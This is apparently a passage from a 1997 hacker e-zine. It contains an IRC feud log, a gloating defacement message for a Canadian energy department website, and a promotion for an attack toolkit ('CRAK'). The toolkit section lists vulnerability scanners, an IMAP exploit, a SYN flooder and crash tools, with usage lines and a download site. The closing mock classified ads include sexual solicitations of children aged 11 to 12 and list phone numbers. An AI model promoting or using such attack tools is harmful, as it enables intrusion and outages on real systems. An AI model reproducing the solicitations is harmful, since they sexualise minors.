peoples abilities. It's funny though, when MadSeason and I got to #sin questioning them, we get kicked for making them look stupid. And when they as us something, and it doesn't go quite as they planned it. Look what they do... [14:14] *** Now talking in #sin [14:15] hey [14:15] how do i kill all jobs running on a shell ? <[GUNNAR]> Well hello there! [14:15] hey <[GUNNAR]> kill -9 PID <[GUNNAR]> If you really wanna kill it. <[GUNNAR]> Boo Hoo. <[GUNNAR]> Damn, that one didn't go well for you did it? <[GUNNAR]> BTW, use the ps command to get the PID. <[GUNNAR]> la la la la... [14:17] *** Sinning sets mode: +b *!*@*.wco.com [14:17] *** You were kicked by Fa|lur3 (banned) In short, Darkfool, S.I.N. and the rest like him are really just wannabes trying to sound big and bad. Nothing wrong with groups or people who actually hack. But, when you have a group like S.I.N. who's members claim more than they know, it is truely sad. I myself and no great hacker(I'm not a hack. Plain and simple.) nor am I some s00per programmer. But the thing is, I do not claim more than I actually know. This is obviously not how Darkfool thinks of things. He wants to be known as a s00per hacker, which he is not. I'm writing this so you(The Readers) don't buy into this bullshit and be misled by people like Darkfool and the group he is in S.I.N.! They are truely sad people. What a shame I have brought out the truth! I think more is somewhere on http://www.ilf.net/teknopia/ 3. "Welcome to the [D]epartment of [O]wned [E]nergy" : so1o The http://www.doe.ca (Canadian Dept. of Energy) was changed last weekend...

Welcome To The [D]epartment of [O]wned [E]nergy

You could define this as an act of aggression, or you could define it as us, the hackers (or crackers), just adivising you to try and make it more difficult for us, at least employ consultants etc. who have a CLUE. because one day, in the not so distant future, the internet equivalent of Pearl Harbour will occur, and we will only be around to say "We told you so", until that day, we will keep reminding you, get some security, its better for you, its better for us, its better for everyone.

In this case, even though your system runs HP-UX, we advise you still take the time to look into all the exploits that are available for this operating system, and then get over to www.cert.org to find some advisories.

This attack was brought to you in association with 0range Amusements.

Greets to so1o, helix, xFli, modeX, c0d, xrx, zer0x, organik, phractal chaos and all the usual suspects.

In the meantime, maybe you would like to visit...

The CrackHouse

Micro$oft

The CodeZero

We 0wN j00r EnErGy!@# wE 0wN j00R LiGhTbUlBz!@#~

=============================================================================== ==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]== =============================================================================== -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\ =/-/=/-/=/-/=/-/=/-/=/-/ so1o of The CodeZero presents. \-\=\-\=\-\=\-\=\-\=\-\= -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\ =/-/=/-/=/-/=/-/=/-/=/-/ The CodeZero \-\=\-\=\-\=\-\=\-\=\-\= =/-/=/-/=/-/=/-/=/-/=/-/ Remote Attack Kit. \-\=\-\=\-\=\-\=\-\=\-\= =/-/=/-/=/-/=/-/=/-/=/-/ [CRAK] \-\=\-\=\-\=\-\=\-\=\-\= =/-/=/-/=/-/=/-/=/-/=/-/ Version 1.666 \-\=\-\=\-\=\-\=\-\=\-\= -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\ =/-/=/-/=/-/=/-/=/-/=/-/ .:. -=10/07/97=- .:. \-\=\-\=\-\=\-\=\-\=\-\= -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\ New, improved, here it is... =============================================================================== The Contents Of The Kit : =============================================================================== dnsscan : Mass DNS query program, gets lists of systems in entire countries, or all the systems on a network, like *.microsoft.com. smscan : Sendmail version scanner, very useful. phpscan : Scans hosts from a file and outputs a list of php vunerable sites. phpget : Gets files from php vunerable servers. phfscan : Scans hosts from a file and outputs a list of php vunerable sites. ident-scan: Scans all daemons running on ports and determines cool stuff. imap : Exploits imap bug if port 143 is open. tcpprobe : Very simple portscanner. fingah : Uses an apache hole to finger systems if port 79 isnt open. synk5 : The SYN flooder, basically kicks the shit out of systems. octopus : Octopus with UltiMods (ultima of CodeZero), crashes systems. winuke : This version allows you to select a port, I advise 139 or 113. =============================================================================== Usages : =============================================================================== Use this command to unzip the crak.tar... % tar -xvf crak.tar then it will be copied into /crak, depending on the working directory.. DNSscan : --------- Usage: dnscan [-file ] [-domain ] [-sub ] -file Usages as a list of subdomains and servers to scan. -domain Lists all servers in a first level domain like com or net. -subdomain Lists all servers in a domain. The -domain mode will first create a file called 'domain.' with a list of all subdomains and their name servers, and then use that file in the -file mode. The input file needs to have the following format: [] To list all servers in Japan, do "dnscan -domain jp" To list all servers in the netcom domain, do "dnscan -sub netcom.com" SMscan : smscan PHPscan : phpscan PHPget : phpget PHFscan : phfscan Ident-Scan : ident-scan [low port] [high port] TCPprobe : tcpprobe Fingah : fingah Synk5 : synk5 Octopus : octopus [port] (default port is 25) Winnuke : winnuke [port] (default port is 139) =============================================================================== Where To Get CRAK.tar : http://www.codez.com =============================================================================== It can be unzipped with WinZip if you are in W1nd0ze too.. :) =============================================================================== ==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]== =============================================================================== --------------------------------------+--------------------------------------- | YOUR SPECIAL AD | LET'S BE FREE | COULD BE RIGHT HERE #@! | Gay White Male 38, 5'11" looking | for men, 12 - 32 clean, fit, and SEND ELECTRONIC MAIL TO: | hairy. Discreet Encounters. ADZ@CODEZ.COM | Call Anytime : (816)781-8009 | (Ask for Tommy) | --------------------------------------+--------------------------------------- | ARE YOU 11 OR 12 ??? | FREE FONESEX! CALL ME NOW!@ | Looking for men 11 - 12 for adult | Yeah huney, you know you want me, video satisfaction. I am 35 into | I'll treat you just right, I'm Professional wrestling. | waiting for your call today! Let's talk soon : (816)453-8722 | CALL ME NOW!@# : (847)546-9154 | (Ask for Kim) --------------------------------------+--------------------------------------- .oO The CodeZero Oo. _ /| k0dek4t sez... \'o O' =(_o_)= "EyEm HuNGaRy FoR CoDeZ, U nOt CaTf00d!!#@" ---------------------------------- -- HTTP://WWW.CODEZ.COM -- ---------------------------------- Remember, McDonalds Owns You, And Ronald Is The KinG!!! Wendy Is Satan!! Don't Believe The Lies!! PHEAR WENDY!@#*